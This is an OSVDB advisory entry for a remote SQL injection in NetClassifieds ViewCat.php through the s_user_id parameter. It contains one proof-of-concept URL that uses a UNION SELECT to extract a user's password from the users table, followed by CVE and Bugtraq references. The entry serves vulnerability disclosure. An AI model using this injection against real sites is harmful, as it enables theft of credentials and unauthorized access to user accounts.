NetClassifieds ViewCat.php s_user_id Multiple Variable Remote SQL Injection

2007-07-21T00:00:00
ID OSVDB:36330
Type osvdb
Reporter OSVDB
Modified 2007-07-21T00:00:00

Description

Manual Testing Notes

http://[target]/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/*

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0273.html ISS X-Force ID: 34994 CVE-2007-3354 Bugtraq ID: 24584